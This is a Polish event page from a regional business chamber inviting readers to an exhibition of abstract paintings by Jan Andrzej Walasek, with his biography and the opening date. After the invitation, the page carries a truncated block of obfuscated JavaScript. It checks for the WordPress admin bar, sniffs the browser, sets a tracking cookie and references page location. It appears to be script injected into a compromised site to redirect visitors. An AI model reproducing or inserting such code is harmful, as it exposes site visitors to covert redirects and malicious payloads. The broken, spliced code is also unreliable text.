Jan Andrzej Walasek. Abstrakcja – Wernisaż w Galerii MPS | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!

W imieniu Zarządu MPS International Sp. z o.o. oraz Artysty Jana Andrzeja Walaska serdecznie zapraszamy na kolejny wernisaż w Galerii MPS. Tym razem będą mogli Państwo podziwiać malarstwo abstrakcyjne.

Jan Andrzej Walasek od lat szkolnych rysował i malował, by z czasem sztuka stała się jego pasją. Poszukiwał form rozwoju plastycznego poprzez udział w grupach twórczych i działaniach artystycznych. Był współtwórcą Pracowni Malarstwa MŁYN w Działdowie. Ukończył z wyróżnieniem studia licencjackie na Akademii Sztuk Pięknych w Gdańsku i magisterskie na Uniwersytecie Warmińsko-Mazurskim w Olsztynie.

W swojej twórczości podejmuje różne tematy, głównie inspirowane naturą, ale też odwołuje się do twórczości wielkich mistrzów. W 2011 roku otrzymał medal Zasłużony Kulturze Gloria Artis.

Pierwsze próby malarstwa abstrakcyjnego Jan Andrzej Walasek podjął w połowie lat 90. ub. w. Początkowo były to rysunki, w których artysta poszukiwał form, znaków i układów kompozycyjnych. Z czasem uznał, że praca nad abstrakcją jest istotą tworzenia, w której proces malarski opiera się na ciągłych poszukiwaniach, zmierzających ku czemuś nieokreślonemu. – Chcę, by te obrazy miały moc i siłę działania, dlatego stosuję ekspresyjne formy, zróżnicowane faktury i mocne kolory w kontrastowych zestawieniach – dodaje autor.

Wernisaż odbędzie się w piątek, 26 lipca, o godz. 15:30 na parterze budynku MPS.

Serdecznie zapraszamy!

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m